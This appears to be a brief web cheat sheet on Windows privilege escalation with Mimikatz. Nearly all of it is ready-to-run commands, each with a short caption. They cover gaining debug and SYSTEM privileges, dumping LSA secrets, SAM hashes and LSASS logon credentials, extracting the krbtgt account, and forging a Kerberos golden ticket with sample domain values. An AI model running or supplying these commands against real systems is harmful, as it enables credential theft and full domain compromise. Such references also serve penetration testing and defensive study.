Last modified: 2022-11-20

Privilege Escalation Windows

Mimikatz is a password dumping tool for Windows. It also manages Kerberos tickets. Kiwi is the updated version of Mimikatz.

You can download it from the GitHub repository.


  • Check if Mimikatz Running as an Administrator

    mimikatz # privilege::debug
  • Elevate to SYSTEM Level

    mimikatz # token::elevate
  • Dump Hashes

    mimikatz # lsadump::lsa /patch
    • Security Identifier of the Kerberos Ticket Granting Ticket Account

      mimikatz # lsadump::lsa /inject /name:krbtgt
    • All SAM Local Password Hashes

      mimikatz # lsadump::sam
    • Credentials from the LSASS Memory

      mimikatz # sekurlsa::logonpasswords
  • Create a Kerberos Golden Ticket

    mimikatz # kerberos::golden /user:Administrator /domain:sample.domain /sid
    :S-1-5-21-849420856-2351964222-986696166 /krbtgt:7808900312cc005cf7082a9a89eb
    dfdf /id:500
  1. Open a New Command Prompt

    mimikatz # misc::cmd